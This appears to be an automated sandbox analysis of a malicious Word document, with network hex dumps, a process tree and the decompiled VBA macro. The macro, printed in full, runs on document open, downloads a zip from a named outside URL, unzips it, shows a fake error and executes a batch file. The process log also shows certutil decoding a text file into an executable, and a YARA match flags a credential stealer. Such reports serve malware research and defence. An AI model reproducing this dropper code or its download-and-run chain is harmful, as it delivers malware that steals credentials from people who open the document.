                            Data Raw: 50 4b 03 04 14 00 00 00 08 00 67 5d 59 5a a7 bd e5 37 d8 72 01 00 74 fd 03 00 07 00 00 00 50 70 6f 2e 62 61 74 dc 7d 5b 73 ea ba 96 ee 7b 57 f5 7f 58 2f fb 29 55 27 4e 20 99 f0 70 ba 5a 92 e5 0b c6 10 19 0c 98 3a 2f c1 04 61 6e 4e 20 c1 90 5f 7f 34 86 2c 2e 21 99 2b 59 b3 ba cf a9 ce ae 3d b1 ad db 18 fa c6 55 92 bd fe f3 29 9d e6 7f e5 93 c9 bf ff db e6 e9 75 91 a7 8f 8b bf 9e 56 8f a3 c5 d3 d3 ee f5 69 b5 c9 f2 d5 a6 7c 30 7e 5a 3c ee d5 bf bb e7 47 7c 8e 2d fe ea f2 f0 81 92 0e bf af fe ef 7f c1 f5 bf fe 4f 76 53 7f 94 f5 fb d1 76 fe bf 5e 77 af c7 5a 7c c0 3f a9 f2 b4 7b fa f7 7f 43 22 ba bd 17 41 48 48 d4 1f 87 7f ae af 6b 84 34 25 31 7f 82 fc ec 4f b7 ac 4e de 64 95 bc 92 55 cb 1f 49 da 0d ad 69 cf 9d 3e a7 7b 5a a4 cb fa 2a 5d 3a af be db 9a 8e 96 77 db 31 a3 d9 b0 43 f7 e3 7e 55 3e aa ff 47 bc de f5 dd 9b ed d0 8d df 6c 61 05 8d 43 cf 54 44 8a 98 2e e1 36 21 9d f1 62 12 1f 07 6d 13 e2 4b de 54 85 84 b4 aa 4c fd eb 9b a2 c1 d6 62 07 b2 74 3f 47 32 65 79 a7 ff dc b3 3a c5 69 2b 9f 24 7e 8c 8f [TRUNCATED]
                            Data Ascii: PKg]YZ7rtPpo.bat}[s{WX/)U'N pZ:/anN _4,.!+Y=U)uVi|0~Z<G|-OvSv^wZ|?{C"AHHk4%1ONdUIi>{Z*]:w1C~U>GlaCTD.6!bmKTLbt?G2ey:i+$~Mn&NM`Zcwp5L-SyKW}IvI>a&j,Fn}VV.d@E_kQ>b$%.&BPI)h.uZk@`x&@A$LQ/diAb1M`U:6M(&&nm?Od`CwwRY=C}`<JlH;dmn r0 1AZr)M,{&@g =EYwtS5L9K?8/*PBKx<Lpre{'/z>A2uFw}6zNtWO6olT|~?eiX\f~j\1ukCCA$wZk|8zZMHm6jw7t~;aZKa6N# (q=$Y:X
                            Mar 4, 2025 09:50:19.961174965 CET1236INData Raw: 8f 88 6f 77 32 09 46 d5 65 45 fa 4a 85 e8 c7 53 f1 42 77 c5 fb 69 dd c0 b2 3c d7 0e 15 4a 61 0e 32 47 b3 44 89 91 6f 2b f5 04 12 5d 5b 44 5e 53 c4 dc 59 00 bc 87 76 0a 8e cd 9b e9 53 b5 e5 5a c4 93 2e 25 a7 f5 93 06 17 d1 16 64 91 49 b9 99 8b e4
                            Data Ascii: ow2FeEJSBwi<Ja2GDo+][D^SYvSZ.%dI4D5o]YHM~F?;;u_2%l]H2VP4hhBX.yp4]`"G3xk<KmLB>{;A}&}Yi8O
                            Mar 4, 2025 09:50:19.961230040 CET448INData Raw: 65 d9 37 4e 3a 9b 2b 95 a1 c6 ba ae 03 12 be da 32 da 8b 82 1f 63 5b a5 5a ca 11 77 a8 a6 4f 05 59 c9 46 05 4f 91 0a a6 72 47 60 b0 74 92 8b 30 5c 22 b0 31 36 ef ed bb e2 a4 1f d9 da 62 b6 2c 73 3e da a3 d4 37 9d a2 58 f7 95 75 f7 71 da c6 e5 af
                            Data Ascii: e7N:+2c[ZwOYFOrG`t0\"16b,s>7Xuq7E~BB`mB"N@u^CtP!-FE=rGh&jmO9|fatf8P\<(3;*}[sO'U|a))(#DIznx:u
                            Mar 4, 2025 09:50:19.961265087 CET1236INData Raw: 31 72 5d 5f c0 18 78 dd a5 d4 e7 65 70 96 83 7a 32 03 71 f6 1a 90 55 3c 2e cd 82 4d 5e f4 35 2f e2 0e ed 68 4f 1d 30 e0 ed f9 60 16 1a aa 5f d3 17 b8 4d 36 0d 5d 48 81 87 68 46 4c 1b eb b4 cd a0 cc 8d e8 d9 ea da 2a 9e e0 b8 c4 57 e5 8d 1b 0c 9c
                            Data Ascii: 1r]_xepz2qU<.M^5/hO0`_M6]HhFL*W:Sq6ngzvZwZ-NEi<dC,R94>)3t,ZE`V!`|<[\,oX/*y(dxR#Eq <g3I)
                            Mar 4, 2025 09:50:19.961302042 CET224INData Raw: 9a 6e 95 7f 72 71 b7 1d a0 87 08 1f b8 48 3b f6 7e 8a b9 2d 9f d2 6d a2 55 7c af 72 59 c1 65 2d 4f b4 57 8f f8 94 e7 89 f6 32 c8 0f df 11 68 37 c5 76 3b de e1 9d 29 f2 40 77 5c 8c ea 39 7a 77 7b 59 f2 fa b8 1e 0f 0a c4 ae 8d fc 2e 8d 07 6c 61 10
                            Data Ascii: nrqH;~-mU|rYe-OW2h7v;)@w\9zw{Y.lapMc6ODvHBe/f!bD;E\NYhj<}5_0|6v7z`2!=d$!w8Ou/`_Y
                            Mar 4, 2025 09:50:19.961335897 CET1236INData Raw: 76 21 6a ba 7d a2 5a 4e 15 23 02 da 88 92 c8 0d 1a db 1e 41 27 df 2b cb a8 29 e3 b7 75 88 22 82 19 98 25 e2 66 5a 44 86 16 d2 13 85 31 4e a1 86 b9 1f ec 36 91 b3 ac 2f 35 ac f3 c8 21 7e e4 46 3c 39 f0 8d 34 25 aa 8e 11 e3 77 10 e3 3e c0 ea 2c 0f
                            Data Ascii: v!j}ZN#A'+)u"%fZD1N6/5!~F<94%w>,b"}9xQ"=u" AQf`'p5{_:j}O]79NQ[r7z&K`jEG{rhL,/_Ojo[,)i/ZM>+t4wEU9;&olSXaS3;
                            Mar 4, 2025 09:50:19.961369991 CET1236INData Raw: e0 62 54 c1 29 eb d2 9d af b8 c1 1c e6 55 08 7f d0 10 cf da 12 43 80 50 b9 61 5a a4 8b 7b 2d 12 29 c3 f3 5a 6c 3b de a0 e7 6c fc 12 28 62 a1 a7 44 89 95 a2 74 0d 53 74 2e 4a 69 3e 01 b1 7e ad 26 2a ed df 72 25 12 48 1b 2b 9a 86 ae c3 ca e0 34 d2
                            Data Ascii: bT)UCPaZ{-)Zl;l(bDtSt.Ji>~&*r%H+4tuXPz;`GcDZ!/$Jp?h$X4R}58;X<!g1x=).2rlqUn-eY~k"lpX)n!f{
                            Mar 4, 2025 09:50:19.961406946 CET448INData Raw: c6 f6 2b b4 39 f2 27 1d 84 b5 cf 3f f2 f7 f6 09 7f de 39 7f d5 73 fe a8 56 cb 44 7e e4 af f6 09 7f f2 9c bf e2 9c bf 40 ab e5 ec 23 7f e1 27 6a d9 11 67 fc 15 1f f8 bb d7 fc 89 8f fc ed 3e e1 2f 38 e3 cf e6 e7 fc 71 ad 96 43 f1 81 bf 99 ff 09 7f
                            Data Ascii: +9'?9sVD~@#'jg>/8qC3By@OK{?oK?g}_?qWEK/q}S-md{W-hoAOx\6\BYt*)@v}81)ULZ=UWT^YS{e}'~
                            Mar 4, 2025 09:50:19.961442947 CET1236INData Raw: ca f5 d8 98 8f aa a0 7b b5 c7 ba e5 69 87 72 f5 ee a6 51 b6 cb c1 16 b2 69 c8 e1 48 f1 a4 8f 41 af 92 51 a0 33 da be ea bd 3a 0f 96 66 5e d1 bb de 50 32 95 87 f6 aa 8d 37 49 74 10 6f 16 f8 69 e1 e7 1c 73 e6 9b 3b dc b6 5f bd e1 fe 28 2f 52 35 0f
                            Data Ascii: {irQiHAQ3:f^P27Itois;_(/R5WA|lzTl_A)R`{uR{3^~=Ia..ULWtAXSn6HWmx[K4Gf%l)Rce,63
                            Mar 4, 2025 09:50:19.961483002 CET1236INData Raw: be 50 9b 6f 40 33 e4 d1 fc 14 9a 8a 86 66 b1 9f 0a f9 0d 68 d2 0b 68 9e 8e de 63 fb 39 34 c1 96 91 23 34 ee 94 3f 9e 42 f3 a4 bd c7 63 ba ae 9d 42 33 fa 00 8d 5b 4e 43 f5 08 4d 52 d2 34 3f 42 53 7c 0e cd ba 90 27 d0 6c 22 f7 d4 7b 54 e6 1a 9a 4a
                            Data Ascii: Po@3fhhc94#4?BcB3[NCMR4?BS|'l"{TJsvM2}:zCRO0HytT5=600M0">>@{q:%1F%[5VL=rA;|6Gh&<BS.AS.Oh!;\]BS4{gw#}#4
                            Mar 4, 2025 09:50:19.966681957 CET1236INData Raw: 47 42 eb 2f da fc bc c3 e7 d6 d8 ea 56 7b 6c 92 dc c1 05 04 6b 6b 89 c1 21 be 39 9b 6e 92 16 7c f9 f3 86 00 de 1f ca 5e a5 2e 13 97 65 ce ed 75 5f 07 73 6f d8 ff a8 8e 47 40 fb a3 7a 19 c4 e1 0b 13 d1 d6 c2 5c 63 bc bd 3d ef 1f df d4 6c 1c ef 1f
                            Data Ascii: GB/V{lkk!9n|^.eu_soG@z\c=luIb+R29G\"RgN2VEb^C!Jk/{@)Us:LdaI6)*?DCzoM'~67qc$Fw0m


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:03:50:12
                            Start date:04/03/2025
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                            Imagebase:0x1d0000
                            File size:1'620'872 bytes
                            MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:03:50:24
                            Start date:04/03/2025
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" "
                            Imagebase:0x1c0000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:8
                            Start time:03:50:24
                            Start date:04/03/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:11
                            Start time:03:50:27
                            Start date:04/03/2025
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\3546255\Ppo.bat" "
                            Imagebase:0x1c0000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:12
                            Start time:03:50:27
                            Start date:04/03/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:13
                            Start time:03:50:29
                            Start date:04/03/2025
                            Path:C:\Windows\SysWOW64\certutil.exe
                            Wow64 process (32bit):true
                            Commandline:certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
                            Imagebase:0xf40000
                            File size:1'277'440 bytes
                            MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:14
                            Start time:03:50:34
                            Start date:04/03/2025
                            Path:C:\Windows\SysWOW64\certutil.exe
                            Wow64 process (32bit):true
                            Commandline:certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
                            Imagebase:0xf40000
                            File size:1'277'440 bytes
                            MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:moderate
                            Has exited:true

                            Disassembly

                            Code Analysis

                            Call Graph

                            Module: ThisDocument

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "ThisDocument"

                            2

                            Attribute VB_Base = "1Normal.ThisDocument"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = True

                            8

                            Attribute VB_Customizable = True

                            Executed Functions

                            Subroutine

                            DownloadUnzipAndRunAPIs: 25, Strings: 4, Number of lines: 22, Relevance: 66.022

                            APIsMeta Information

                            Part of subcall function GenerateRandomValue@ThisDocument: Randomize

                            Part of subcall function GenerateRandomValue@ThisDocument: Trim

                            Part of subcall function GenerateRandomValue@ThisDocument: Str

                            Part of subcall function GenerateRandomValue@ThisDocument: Int

                            Part of subcall function GenerateRandomValue@ThisDocument: Rnd

                            Part of subcall function GenerateRandomValue@ThisDocument: lowerbound

                            MkDir

                            Part of subcall function downloadFile@ThisDocument: CreateObject

                            Part of subcall function downloadFile@ThisDocument: Open

                            Part of subcall function downloadFile@ThisDocument: Send

                            Part of subcall function downloadFile@ThisDocument: Status

                            Part of subcall function downloadFile@ThisDocument: CreateObject

                            Part of subcall function downloadFile@ThisDocument: Open

                            Part of subcall function downloadFile@ThisDocument: Type

                            Part of subcall function downloadFile@ThisDocument: Write

                            Part of subcall function downloadFile@ThisDocument: ResponseBody

                            Part of subcall function downloadFile@ThisDocument: SaveToFile

                            Part of subcall function downloadFile@ThisDocument: Close

                            Part of subcall function Unzip@ThisDocument: NameSpace

                            Part of subcall function Unzip@ThisDocument: NameSpace

                            Part of subcall function Unzip@ThisDocument: CopyHere

                            Part of subcall function Unzip@ThisDocument: Items

                            CreateObject

                            		CreateObject("WScript.Shell")

                            MsgBox

                            Run

                            		IWshShell3.Run("C:\3546255\\Ppo.bat") -> 0 IWshShell3.Run("C:\5564642\\Ppo.bat") -> 0
                            StringsDecrypted Strings
                            "http://portalsphere.free.fr/phUploader/uploads/1741130958.zip"
                            "C:\"
                            "WScript.Shell"
                            "File Error loading,please sender.."
                            LineInstructionMeta Information
                            38

                            Sub DownloadUnzipAndRun()

                            39

                            Dim url as String

                            executed
                            40

                            Dim savePath as String

                            41

                            Dim ShellApp as Object

                            42

                            Dim rundomnum as String

                            43

                            Dim dirr as String

                            44

                            url = "http://portalsphere.free.fr/phUploader/uploads/1741130958.zip"

                            45

                            rundomnum = GenerateRandomValue

                            46

                            dirr = "C:\" & rundomnum & "\"

                            47

                            MkDir dirr

                            MkDir

                            48

                            savePath = dirr & "1741130958.zip"

                            49

                            downloadFile url, savePath

                            50

                            Unzip dirr

                            51

                            Dim objShell as Object

                            52

                            Set objShell = CreateObject("WScript.Shell")

                            CreateObject("WScript.Shell")

                            executed
                            53

                            MsgBox "File Error loading,please sender.."

                            MsgBox

                            54

                            objShell.Run dirr & "\Ppo.bat"

                            IWshShell3.Run("C:\3546255\\Ppo.bat") -> 0

                            executed
                            55

                            Set WinHttpReq = Nothing

                            56

                            Set oStream = Nothing

                            57

                            Set ShellApp = Nothing

                            58

                            Set objShell = Nothing

                            59

                            End Sub

                            Subroutine

                            downloadFileAPIs: 11, Strings: 4, Number of lines: 14, Relevance: 54.014

                            APIsMeta Information

                            CreateObject

                            		CreateObject("Microsoft.XMLHTTP")

                            Open

                            		IServerXMLHTTPRequest2.Open("GET","http://portalsphere.free.fr/phUploader/uploads/1741130958.zip",False)

                            Send

                            Status

                            		IServerXMLHTTPRequest2.Status() -> 200

                            CreateObject

                            		CreateObject("ADODB.Stream")

                            Open

                            		Stream.Open()

                            Type

                            Write

                            		Stream.Write(??\x14\x00\x08?????\x01?\x03\x07\x00??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'?????????????????????????????????u???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????_??????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????4????????????????????????????????????????????????????????????????????????????????????o??????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O???????????????????????????????????????????????????????????????????????????????l?????????????????????????????????????????????????????????????????U???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'????????????r??????????????????????????????????????????????????????????????????????????????????????????????????>????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????;????????????????????????????????????????????????????????????????????????????????????????????????????????C?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O????????\x12??????????????????????????????????????????????????????????????????????????)

                            ResponseBody

                            		IServerXMLHTTPRequest2.ResponseBody() -> ??\x14\x00\x08?????\x01?\x03\x07\x00??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'?????????????????????????????????u???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????_??????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????4????????????????????????????????????????????????????????????????????????????????????o??????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O???????????????????????????????????????????????????????????????????????????????l?????????????????????????????????????????????????????????????????U???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'????????????r??????????????????????????????????????????????????????????????????????????????????????????????????>????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????;????????????????????????????????????????????????????????????????????????????????????????????????????????C?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O????????\x12??????????????????????????????????????????????????????????????????????????

                            SaveToFile

                            Close

                            StringsDecrypted Strings
                            "Microsoft.XMLHTTP"
                            "GET"
                            "ADODB.Stream"
                            "ADODB.Stream"
                            LineInstructionMeta Information
                            9

                            Sub downloadFile(url as String, fileOutPath as String)

                            10

                            Dim WinHttpReq as Object, oStream as Object

                            executed
                            11

                            Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

                            CreateObject("Microsoft.XMLHTTP")

                            executed
                            12

                            WinHttpReq.Open "GET", url, False

                            IServerXMLHTTPRequest2.Open("GET","http://portalsphere.free.fr/phUploader/uploads/1741130958.zip",False)

                            executed
                            13

                            WinHttpReq.Send

                            Send

                            14

                            If WinHttpReq.Status = 200 Then

                            IServerXMLHTTPRequest2.Status() -> 200

                            executed
                            15

                            Set oStream = CreateObject("ADODB.Stream")

                            CreateObject("ADODB.Stream")

                            executed
                            16

                            oStream.Open

                            Stream.Open()

                            executed
                            17

                            oStream.Type = 1

                            Type

                            18

                            oStream.Write WinHttpReq.ResponseBody

                            Stream.Write(??\x14\x00\x08?????\x01?\x03\x07\x00??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'?????????????????????????????????u???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????_??????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????4????????????????????????????????????????????????????????????????????????????????????o??????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O???????????????????????????????????????????????????????????????????????????????l?????????????????????????????????????????????????????????????????U???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'????????????r??????????????????????????????????????????????????????????????????????????????????????????????????>????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????;????????????????????????????????????????????????????????????????????????????????????????????????????????C?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O????????\x12??????????????????????????????????????????????????????????????????????????)

                            IServerXMLHTTPRequest2.ResponseBody() -> ??\x14\x00\x08?????\x01?\x03\x07\x00??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'?????????????????????????????????u???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????_??????????????????????????????????????????????????????\xfffd????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????4????????????????????????????????????????????????????????????????????????????????????o??????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????N?????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O???????????????????????????????????????????????????????????????????????????????l?????????????????????????????????????????????????????????????????U???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'????????????r??????????????????????????????????????????????????????????????????????????????????????????????????>????????????????????????????????????????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????;????????????????????????????????????????????????????????????????????????????????????????????????????????C?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????O????????\x12??????????????????????????????????????????????????????????????????????????

                            executed
                            19

                            oStream.SaveToFile fileOutPath, 2

                            SaveToFile

                            20

                            oStream.Close

                            Close

                            21

                            Endif

                            22

                            End Sub

                            Subroutine

                            Document_OpenAPIs: 4, Strings: 0, Number of lines: 3, Relevance: 7.503

                            APIsMeta Information

                            Part of subcall function DownloadUnzipAndRun@ThisDocument: MkDir

                            Part of subcall function DownloadUnzipAndRun@ThisDocument: CreateObject

                            Part of subcall function DownloadUnzipAndRun@ThisDocument: MsgBox

                            Part of subcall function DownloadUnzipAndRun@ThisDocument: Run

                            LineInstructionMeta Information
                            60

                            Sub Document_Open()

                            61

                            DownloadUnzipAndRun

                            executed
                            62

                            End Sub

                            Subroutine

                            AutoOpenAPIs: 4, Strings: 0, Number of lines: 3, Relevance: 7.503

                            APIsMeta Information

                            Part of subcall function DownloadUnzipAndRun@ThisDocument: MkDir

                            Part of subcall function DownloadUnzipAndRun@ThisDocument: CreateObject

                            Part of subcall function DownloadUnzipAndRun@ThisDocument: MsgBox

                            Part of subcall function DownloadUnzipAndRun@ThisDocument: Run

                            LineInstructionMeta Information
                            63

                            Sub AutoOpen()

                            64

                            DownloadUnzipAndRun

                            executed
                            65

                            End Sub

                            Function

                            GenerateRandomValueAPIs: 6, Strings: 0, Number of lines: 6, Relevance: 7.506

                            APIsMeta Information

                            Randomize

                            Trim

                            Str

                            Int

                            Rnd

                            lowerbound

                            LineInstructionMeta Information
                            32

                            Function GenerateRandomValue() as String

                            33

                            Dim randomNum as String

                            executed
                            34

                            Randomize

                            Randomize

                            35

                            randomNum = Trim(Str(Int((10000000 - 11 + 1) * Rnd + lowerbound)))

                            Trim

                            Str

                            Int

                            Rnd

                            lowerbound

                            36

                            GenerateRandomValue = randomNum

                            37

                            End Function

                            Subroutine

                            UnzipAPIs: 4, Strings: 0, Number of lines: 9, Relevance: 5.009

                            APIsMeta Information

                            NameSpace

                            NameSpace

                            CopyHere

                            Items

                            LineInstructionMeta Information
                            23

                            Sub Unzip(dirr as String)

                            24

                            Dim sh as Shell32.Shell

                            executed
                            25

                            Dim sf as Shell32.Folder

                            26

                            Dim df as Shell32.Folder

                            27

                            Set sh = New Shell32.Shell

                            28

                            Set df = sh.NameSpace(dirr)

                            NameSpace

                            29

                            Set sf = sh.NameSpace(dirr & "1741130958.zip")

                            NameSpace

                            30

                            df.CopyHere sf.Items

                            CopyHere

                            Items

                            31

                            End Sub

                            Reset < >